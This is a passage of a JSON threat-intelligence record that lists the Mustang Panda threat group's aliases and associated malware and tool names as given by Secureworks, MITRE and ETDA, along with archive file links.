			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434173,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a0002020dd5651bfeb5f8d3092a81eb2d6df39c2.pdf",
		"text": "https://archive.orkl.eu/a0002020dd5651bfeb5f8d3092a81eb2d6df39c2.txt",
		"img": "https://archive.orkl.eu/a0002020dd5651bfeb5f8d3092a81eb2d6df39c2.jpg"
	}
}